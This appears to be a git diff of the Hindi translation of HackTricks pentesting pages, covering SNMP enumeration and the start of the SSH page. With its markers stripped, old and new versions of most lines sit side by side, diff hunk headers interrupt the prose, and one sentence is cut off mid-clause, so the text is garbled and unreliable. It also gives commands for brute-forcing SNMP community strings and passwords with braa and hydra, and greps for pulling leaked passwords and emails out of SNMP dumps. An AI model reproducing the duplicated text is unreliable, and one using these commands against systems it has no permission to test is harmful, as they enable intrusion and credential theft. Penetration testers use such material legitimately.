* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **bug bounty प्लेटफॉर्म जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है**! आज ही [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) पर हमसे जुड़ें, और **$100,000** तक के बाउंटीज कमाना शुरू करें!
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें**, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है**! आज ही हमसे [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) पर जुड़ें, और **$100,000** तक के बाउंटीज कमाना शुरू करें!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -25,49 +27,49 @@ PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public)
```
{% hint style="info" %}
SNMP **162/UDP** पोर्ट का भी उपयोग **traps** के लिए करता है। ये **डेटा पैकेट्स होते हैं जो SNMP सर्वर से क्लाइंट को बिना स्पष्ट रूप से अनुरोध किए भेजे जाते हैं**।
SNMP पोर्ट **162/UDP** का भी उपयोग **traps** के लिए करता है। ये डेटा **पैकेट्स होते हैं जो SNMP सर्वर से क्लाइंट को बिना स्पष्ट रूप से अनुरोध किए भेजे जाते हैं**।
{% endhint %}
### MIB
SNMP पहुँच को निर्माताओं के बीच और विभिन्न क्लाइंट-सर्वर संयोजनों के साथ काम करने के लिए सुनिश्चित करने के लिए, **Management Information Base (MIB)** बनाया गया था। MIB एक **स्वतंत्र प्रारूप है जो डिवाइस जानकारी को संग्रहित करता है**। MIB एक **पाठ** फ़ाइल होती है जिसमें एक डिवाइस के सभी पूछताछ योग्य **SNMP ऑब्जेक्ट्स** को एक **मानकीकृत** वृक्ष संरचना में सूचीबद्ध किया जाता है। इसमें कम से कम एक `Object Identifier` (`OID`) होता है, जो आवश्यक **अद्वितीय पता** और एक **नाम** के अलावा, उस संबंधित ऑब्जेक्ट के प्रकार, पहुँच अधिकार, और विवरण की जानकारी भी प्रदान करता है।\
यह सुनिश्चित करने के लिए कि SNMP एक्सेस विभिन्न निर्माताओं के साथ और विभिन्न क्लाइंट-सर्वर संयोजनों के साथ काम करता है, **Management Information Base (MIB)** बनाया गया था। MIB एक **स्वतंत्र प्रारूप है जो डिवाइस जानकारी को संग्रहत करता है**। MIB एक **पाठ** फ़ाइल है जिसमें एक डिवाइस के सभी पूछताछ योग्य **SNMP ऑब्जेक्ट्स** को एक **मानकीकृत** वृक्ष पदानुक्रम में सूचीबद्ध किया गया है। इसमें कम से कम एक `Object Identifier` (`OID`) होता है, जो आवश्यक **अद्वितीय पते** और एक **नाम** के अलावा, प्रत्येक ऑब्जेक्ट के प्रकार, पहुँच अधिकार, और विवरण की जानकारी भी प्रदान करता है।\
MIB फ़ाइलें `Abstract Syntax Notation One` (`ASN.1`) आधारित ASCII पाठ प्रारूप में लिखी जाती हैं। **MIBs में डेटा नहीं होता है**, लेकिन ये बताते हैं कि **कौन सी जानकारी कहाँ मिलेगी** और यह कैसी दिखती है, विशिष्ट OID के लिए कौन से मान लौटाए जाते हैं, या कौन सा डेटा प्रकार उपयोग किया जाता है।
### OIDs
**OIDs** का मतलब **O**bject **Id**entifiers होता है। **OIDs MIB संरचना में प्रबंधित ऑब्जेक्ट्स की अद्वितीय पहचान करते हैं**। इसे एक वृक्ष के रूप में चित्रित किया जा सकता है, जिसके स्तर विभिन्न संगठनों द्वारा निर्धारित किए जाते हैं। शीर्ष स्तर MIB ऑब्जेक्ट IDs (OIDs) विभिन्न मानक संगठनों के होते हैं।\
**विक्रेता अपने उत्पादों के लिए निजी शाखाएँ सहित प्रबंधित ऑब्जेक्ट्स को परिभाषित करते हैं।**
**OIDs** का मतलब है **O**bject **Id**entifiers। **OIDs एक MIB पदानुक्रम में प्रबंधित ऑब्जेक्ट्स की अद्वितीय पहचान करते हैं**। इसे एक वृक्ष के रूप में चित्रित किया जा सकता है, जिसके स्तर विभिन्न संगठनों द्वारा निर्धारित किए जाते हैं। शीर्ष स्तर MIB ऑब्जेक्ट IDs (OIDs) विभिन्न मानक संगठनों के होते हैं।\
**विक्रेता अपने स्वयं के उत्पादों के लिए प्रबंधित ऑब्जेक्ट्स सहित निजी शाखाएँ परिभाषित करते हैं।**
![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
आप वेब से एक **OID वृक्ष** के माध्यम से **नेविगेट** कर सकते हैं यहाँ: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) या **देख सकते हैं कि OID का मतलब क्या है** (जैसे `1.3.6.1.2.1.1`) यहाँ पहुँचकर [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1)।\
कुछ **प्रसिद्ध OIDs** हैं जैसे [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) में शामिल हैं जो MIB-2 द्वारा परिभाषित Simple Network Management Protocol (SNMP) चर को संदर्भित करते हैं। और इस **OID से लटके हुए** आप कुछ दिलचस्प होस्ट डेटा प्राप्त कर सकते हैं (सिस्टम डेटा, नेटवर्क डेटा, प्रक्रिया डेटा...)
आप वेब से एक **OID वृक्ष** के माध्यम से **नेविगेट** कर सकते हैं यहाँ: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) या **देख सकते हैं कि OID का क्या मतलब है** (जैसे `1.3.6.1.2.1.1`) यहाँ पहुँचकर [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1)।\
कुछ **प्रसिद्ध OIDs** हैं जैसे [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) में शामिल हैं जो MIB-2 द्वारा परिभाषित Simple Network Management Protocol (SNMP) चर को संदर्भित करते हैं। और इस **OID से लटके हुए** आप कुछ दिलचस्प होस्ट डेटा प्राप्त कर सकते हैं (सिस्टम डेटा, नेटवर्क डेटा, प्रोसेस डेटा...)
### **OID उदाहरण**
**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3 . 21 . 1 . 4 . 7`**
**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
यहाँ इस पते का विश्लेषण है।
* 1 इसे ISO कहा जाता है और यह स्थापित करता है कि यह एक OID है। इसीलिए सभी OIDs "1" से शुरू होते हैं।
* 1 इसे ISO कहा जाता है और यह स्थापित करता है कि यह एक OID है। इसीलिए सभी OIDs “1” से शुरू होते हैं।
* 3 इसे ORG कहा जाता है और इसका उपयोग उस संगठन को निर्दिष्ट करने के लिए किया जाता है जिसने डिवाइस बनाया है।
* 6 यह dod है या रक्षा विभाग जो संगठन है जिसने इंटरनेट की स्थापना की थी
* 6 यह dod है या रक्षा विभाग जो संगठन है जिसने सबसे पहले इंटरनेट स्थापित किया था
* 1 यह इंटरनेट का मूल्य है जो दर्शाता है कि सभी संचार इंटरनेट के माध्यम से होंगे।
* 4 यह मूल्य निर्धारित करता है कि यह डिवाइस एक निजी संगठन द्वारा बनाई गई है, न कि सरकारी एक
* 1 यह मूल्य दर्शाता है कि डिवाइस एक उद्यम या व्यापारिक संस्था द्वारा बनाई गई है।
* 4 यह मूल्य निर्धारित करता है कि यह डिवाइस एक निजी संगठन द्वारा बनाया गया है और सरकारी नहीं है
* 1 यह मूल्य दर्शाता है कि डिवाइस एक उद्यम या व्यापारिक संस्था द्वारा बनाया गया है।
ये पहले छह मूल्य सभी डिवाइसों के लिए समान होते हैं और वे आपको उनके बारे में मूल जानकारी देते हैं। यह संख्या का अनुक्रम सभी OIDs के लिए समान होगा, सिवाय जब डिवाइस सरकार द्वारा बनाई गई हो।
ये पहले छह मूल्य सभी डिवाइसों के लिए समान होते हैं और वे आपको उनके बारे में मूल जानकारी देते हैं। यह संख्या का अनुक्रम सभी OIDs के लिए समान होगा, सिवाय जब डिवाइस सरकार द्वारा बनाया गया हो।
अगले सेट की संख्याओं पर जाते हुए।
* 1452 उस संगठन का नाम देता है जिसने यह डिवाइस निर्मित की है।
* 1452 उस संगठन का नाम देता है जिसने यह डिवाइस बनाया है।
* 1 डिवाइस के प्रकार को समझाता है। इस मामले में, यह एक अलार्म घड़ी है।
* 2 निर्धारित करता है कि यह डिवाइस एक रिमोट टर्मिनल यूनिट है।
शेष मूल्य डिवाइस के बारे में विशिष्ट जानकारी देते हैं।
* 5 एक विशिष्ट अलार्म बिंदु को दर्शाता है।
* 1 डिवाइस में एक विशिष्ट बिंदु
* 1 डिवाइस में विशिष्ट बिंदु
* 3 पोर्ट
* 21 पोर्ट का पता
* 1 पोर्ट के लिए डिस्प्ले
@ -80,35 +82,25 @@ _**(उदाहरण यहाँ से लिया गया है**_ [_**
SNMP के 2 महत्वपूर्ण संस्करण हैं:
* **SNMPv1**: मुख्य एक, यह अभी भी सबसे अधिक बार होता है, **प्रमाणीकरण एक स्ट्रिंग पर आधारित होता है** (community string) जो **प्लेन-टेक्स्ट** में यात्रा करता है (सभी जानकारी प्लेन टेक्स्ट में यात्रा करती है)। **संस्करण 2 और 2c** भी **ट्रैफिक को प्लेन टेक्स्ट में भेजते हैं** और **प्रमाणीकरण के रूप में एक community string का उपयोग करते हैं**।
* **SNMPv3**: एक बेहतर **प्रमाणीकरण** रूप का उपयोग करता है और जानकारी **एन्क्रिप्टेड** रूप में यात्रा करती है (**डिक्शनरी अटैक** किया जा सकता है लेकिन SNMPv1 और v2 की तुलना में सही क्रेडेंशियल्स को ढूँढना कहीं अधिक कठिन होगा)।
* **SNMPv1**: मुख्य एक, यह अभी भी सबसे अधिक बार होता है, **प्रमाणीकरण एक स्ट्रिंग पर आधारित होता है** (कम्युनिटी स्ट्रिंग) जो **प्लेन-टेक्स्ट** में यात्रा करता है (सभी जानकारी प्लेन टेक्स्ट में यात्रा करती है)। **संस्करण 2 और 2c** भी **ट्रैफिक को प्लेन टेक्स्ट में भेजते हैं** और **प्रमाणीकरण के रूप में कम्युनिटी स्ट्रिंग का उपयोग करते हैं**।
* **SNMPv3**: एक बेहतर **प्रमाणीकरण** रूप का उपयोग करता है और जानकारी **एन्क्रिप्टेड** रूप में यात्रा करती है (**डिक्शनरी अटैक** किया जा सकता है लेकिन SNMPv1 और v2 की तुलना में सही क्रेडेंशियल्स खोजना कहीं अधिक कठिन होगा)।
### Community Strings
### कम्युनिटी स्ट्रिंग्स
जैसा कि पहले बताया गया है, **MIB पर सहेजी गई जानकारी तक पहुँचने के लिए आपको संस्करण 1 और 2/2c पर community string और संस्करण 3 पर क्रेडेंशियल्स का पता होना चाहिए।**\
दो **प्रकार के community strings होते हैं**:
जैसा कि पहले उल्लेख किया गया है, **MIB पर सहेजी गई जानकारी तक पहुँचने के लिए आपको संस्करण 1 और 2/2c पर कम्युनिटी स्ट्रिंग को जानना होगा और संस्करण 3 पर क्रेडेंशियल्स को जानना होगा।**\
कम्युनिटी स्ट्रिंग्स के **2 प्रकार होते हैं**:
* **`public`** मुख्य रूप से **केवल पढ़ने के लिए** कार्य
* **`private`** **पढ़ने/लिखने के लिए** सामान्यतः
* **`private`** **पढ़ने/लिखने** के लिए सामान्यतः
नोट करें कि **OID की लिखने की क्षमता उपयोग की गई community string पर निर्भर करती है**, इसलिए **यहाँ तक कि** अगर आप पाते हैं कि "**public**" का उपयोग किया जा रहा है, आप कुछ मानों को **लिख सकते हैं।** यह भी हो सकता है कि कुछ ऑब्जेक्ट्स **हमेशा "Read Only" हों।**\
अगर आप किसी ऑब्जेक्ट को **लिखने** की कोशिश करते हैं तो एक **`noSuchName` या `readOnly` त्रुटि** प्राप्त होती है।
संस्करण 1 और 2/2c में अगर आप
## Brute-Force Community String (v1 और v2c)
**Community string का अनुमान लगाने** के लिए आप एक dictionary attack कर सकते हैं। SNMP के खिलाफ brute-force attack करने के [यहाँ विभिन्न तरीके देखें](../../generic-methodologies-and-resources/brute-force.md#snmp)। अक्सर इस्तेमाल किया जाने वाला community string `public` है।
## Enumerating SNMP
यह सलाह दी जाती है कि निम्नलिखित को स्थापित करें ताकि देख सकें कि **प्रत्येक OID जो डिवाइस से एकत्र किया गया है** का क्या अर्थ है:
नोट करें कि **OID की लिखने की क्षमता उपयोग की गई कम्युनिटी स्ट्रिंग पर निर्भर करती है**, इसलिए **यहाँ तक कि** अगर आप पाते हैं कि "**public**" का उपयोग किया जा रहा है, आप कुछ मानों को **लिख सकते हैं।** यह भी **संभव** है कि कुछ ऑब्जेक्ट्स **हमेशा "Read Only" होते हैं
```bash
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
```
यदि आपक एक मान्य कम्युनिटी स्ट्रिंग का पता है, तो आप **SNMPWalk** या **SNMP-Check** का उपयोग करके डेटा तक पहुँच सकते हैं:
यदि आपके पास एक मान्य कम्युनिटी स्ट्रिंग है, तो आप **SNMPWalk** या **SNMP-Check** का उपयोग करके डेटा तक पहुँच सकते हैं:
```bash
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
@ -124,7 +116,7 @@ nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
```
विस्तारित क्वेरीज़ (download-mibs) की बदौलत, निम्नलिखित कमांड के साथ सिस्टम के बारे में और भी अधिक जानकारी गिनना संभव है:
विस्तारित क्वेरीज़ (download-mibs) की बदौलत, निम्नलिखित कमांड के साथ सिस्टम के बारे में और भी अधिक जानकारी एन्युमरेट करना संभव है:
```bash
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```
@ -140,11 +132,11 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
| ------------------------------------------------ | ------------------------------------------------------------------------------------- |
| `rwuser noauth` | प्रमाणीकरण के बिना पूरे OID ट्री तक पहुंच प्रदान करता है। |
| `rwcommunity <community string> <IPv4 address>` | अनुरोध कहां से भेजे गए थे इसकी परवाह किए बिना पूरे OID ट्री तक पहुंच प्रदान करता है। |
| `rwcommunity6 <community string> <IPv6 address>` | `rwcommunity` के समान पहुंच लेकिन IPv6 का उपयोग करते हुए। |
| `rwcommunity6 <community string> <IPv6 address>` | `rwcommunity` के समान पहुंच, लेकिन IPv6 का उपयोग करते हुए। |
### Microsoft Windows SNMP मानक
| **MIB मूल्य** | **विवरण** |
| **MIB मान** | **विवरण** |
| ------------------------------------------------ | ------------------------------------------------------------------------------------- |
| `1.3.6.1.2.1.25.1.6.0` | सिस्टम प्रक्रियाएं। |
| `1.3.6.1.2.1.25.4.2.1.2` | चल रहे कार्यक्रम। |
@ -156,7 +148,7 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
### Cisco
यदि आप Cisco उपकरण का उपयोग कर रहे हैं तो इस पृष्ठ को देखें:
यदि आप Cisco उपकरण हैं, तो इस पृष्ठ को देखें:
{% content-ref url="cisco-snmp.md" %}
[cisco-snmp.md](cisco-snmp.md)
@ -172,7 +164,7 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
## **व्यापक SNMP**
[Braa ](https://github.com/mteg/braa)एक व्यापक SNMP स्कैनर है। इस तरह के उपकरण का इरादा, बेशक, SNMP प्रश्न करना है लेकिन snmpwalk से net-snmp के विपरीत, यह एक साथ दर्जनों या सैकड़ों होस्ट्स को प्रश्न करने में सक्षम है, और एक ही प्रक्रिया में। इस प्रकार, यह बहुत कम सिस्टम संसाधनों का उपभोग करता है और स्कैनिंग बहुत तेजी से करता है।
[Braa ](https://github.com/mteg/braa) एक व्यापक SNMP स्कैनर है। इस तरह के उपकरण का इरादा, बेशक, SNMP प्रश्न करना है लेकिन snmpwalk से अलग net-snmp, यह एक साथ दर्जनों या सैकड़ों होस्ट्स को प्रश्न करने में सक्षम है, और एक ही प्रक्रिया में। इस प्रकार, यह बहुत कम सिस्टम संसाधनों का उपभोग करता है और स्कैनिंग बहुत तेजी से करता है।
Braa अपना खुद का SNMP स्टैक लागू करता है, इसलिए इसे net-snmp जैसी किसी भी SNMP लाइब्रेरी की आवश्यकता नहीं है।
@ -192,13 +184,13 @@ grep ".1.3.6.1.2.1.1.1.0" *.snmp
```
### निजी स्ट्रिंग की पहचान करें
उदाहरण के लिए, यदि मैं किसी संगठन द्वारा उनके Cisco IOS राउटर्स पर प्रयुक्त निजी कम्युनिटी स्ट्रिंग की पहचान कर सकता हूँ, तो मैं उस कम्युनिटी स्ट्रिंग का उपयोग करके उन राउटर्स से चल रहे कॉन्फ़िगरेशन को निकाल सकता हूँ। ऐसे डेटा को खोजने का सबसे अच्छा तरीका अक्सर SNMP Trap डेटा से संबंधित रहा है। इसलिए, निम्नलिखित grep का उपयोग करके हम बहुत सारे MIB डेटा के माध्यम से जल्दी से पार्स कर सकते हैं, “trap” शब्द की कुंजी की खोज करते हुए:
उदाहरण के लिए, यदि मैं किसी संगठन द्वारा उनके Cisco IOS राउटर्स पर प्रयुक्त निजी कम्युनिटी स्ट्रिंग की पहचान कर सकता हूँ, तो मैं उस कम्युनिटी स्ट्रिंग का उपयोग करके उन राउटर्स से चल रहे कॉन्फ़िगरेशन को निकाल सकता हूँ। ऐसे डेटा को खोजने का सबसे अच्छा तरीका अक्सर SNMP Trap डेटा से संबंधित रहा है। इसलिए, निम्नलिखित grep का उपयोग करके हम बहुत सारे MIB डेटा को जल्दी से पार्स कर सकते हैं, "trap" शब्द की खोज करते हुए:
```bash
grep -i "trap" *.snmp
```
### उपयोगकर्ता नाम/पासवर्ड
एक और रुचि का क्षेत्र लॉग्स हैं, मैंने पाया है कि कुछ उपकरणों में MIB तालिकाओं के भीतर लॉग्स होते हैं। ये लॉग्स में असफल लॉगऑन प्रयास भी शामिल हो सकते हैं। सोचिए जब आपने आखिरी बार किसी उपकरण में Telnet या SSH के माध्यम से लॉग इन किया था और गलती से अपना पासवर्ड उपयोगकर्ता नाम के रूप में दर्ज किया था। मैं आमतौर पर _fail_, _failed_ या _login_ जैसे कीवर्ड्स की खोज करता हूँ और उस डेटा की जांच करता हूँ कि क्या कोई मूल्यवान जानकारी है।
एक और रुचि का क्षेत्र लॉग्स हैं, मैंने पाया है कि कुछ उपकरण हैं जो MIB तालिकाओं के भीतर लॉग्स रखते हैं। ये लॉग्स में असफल लॉगऑन प्रयास भी शामिल हो सकते हैं। सोचिए जब आपने आखिरी बार किसी उपकरण में Telnet या SSH के माध्यम से लॉग इन किया था और गलती से अपना पासवर्ड उपयोगकर्ता नाम के रूप में दर्ज किया था। मैं आमतौर पर _fail_, _failed_ या _login_ जैसे कीवर्ड्स की खोज करता हूँ और उस डेटा की जांच करता हूँ कि क्या कोई मूल्यवान जानकारी है।
```bash
grep -i "login\|fail" *.snmp
```
@ -206,9 +198,9 @@ grep -i "login\|fail" *.snmp
```bash
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
```
## SNMP मानों में संशोधन
## SNMP मानों को संशोधित करना
_**NetScanTools**_ का उपयोग करके आप **मानों में संशोधन** कर सकते हैं। ऐसा करने के लिए आपको **निजी स्ट्रिंग** का पता होना चाहिए।
_**NetScanTools**_ का उपयोग करके आप **मानों को संशोधित** कर सकते हैं। ऐसा करने के लिए आपको **निजी स्ट्रिंग** का पता होना चाहिए।
## स्पूफिंग
@ -256,19 +248,21 @@ Command: hydra -P {Big_Passwordlist} -v {IP} snmp
```
```markdown
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
**Bug bounty tip**: **Intigriti** के लिए **sign up** करें, एक प्रीमियम **bug bounty platform जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है**! हमसे जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और **$100,000** तक के bounties कमाना शुरू करें!
**Bug bounty tip**: **Intigriti** के लिए **sign up** करें, एक प्रीमियम **bug bounty platform जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है**! आज ही हमसे जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) पर, और **$100,000** तक के bounties कमाना शुरू करें!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **Join करें** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **follow** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **follow** करें.
* **अपनी hacking tricks को साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>
```

86
network-services-pentesting/pentesting-ssh.md
View file

@ -1,20 +1,22 @@
# 22 - Pentesting SSH/SFTP
# 22 - SSH/SFTP का पेंटेस्टिंग
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अभेद्य को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_धाराप्रवाह पोलिश लिखित और बोली जाने वाली आवश्यकता है_).
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैक्य को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_पोलिश भाषा में धाराप्रवाह लिखित और बोलचाल आवश्यक है_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -28,15 +30,15 @@
```
**SSH सर्वर:**
* [openSSH](http://www.openssh.org) OpenBSD SSH, BSD, Linux वितरणों और Windows 10 से Windows में शामिल
* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) कम मेमोरी और प्रोसेसर संसाधनों वाले वातावरणों के लिए SSH कार्यान्वयन, OpenWrt में शामिल
* [openSSH](http://www.openssh.org) OpenBSD SSH, BSD, Linux वितरण और Windows में Windows 10 से शिप किया गया
* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) कम मेमोरी और प्रोसेसर संसाधनों वाले वातावरण के लिए SSH कार्यान्वयन, OpenWrt में शिप किया गया
* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) Windows के लिए SSH कार्यान्वयन, क्लाइंट आमतौर पर इस्तेमाल किया जाता है लेकिन सर्वर का उपयोग दुर्लभ है
* [CopSSH](https://www.itefix.net/copssh) Windows के लिए OpenSSH का कार्यान्वयन
**SSH पुस्तकालय (सर्वर-साइड कार्यान्वयन):**
